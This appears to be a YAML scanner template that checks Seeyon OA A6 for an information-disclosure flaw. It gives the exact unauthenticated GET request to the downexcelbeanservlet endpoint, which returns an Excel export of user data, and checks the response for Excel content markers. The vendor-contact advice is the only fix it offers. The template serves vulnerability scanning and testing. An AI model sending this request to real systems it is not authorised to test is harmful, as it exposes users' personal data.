product: 致远OA
vName: 致远OA A6 downexcelbeanservlet信息泄露
type: 信息泄漏
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /yyoa/downexcelbeanservlet?contenttype=username&contentvalue=&state=1&per_id=0
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '[Content_Types].xml'
              - Excel.Sheet
            logic: and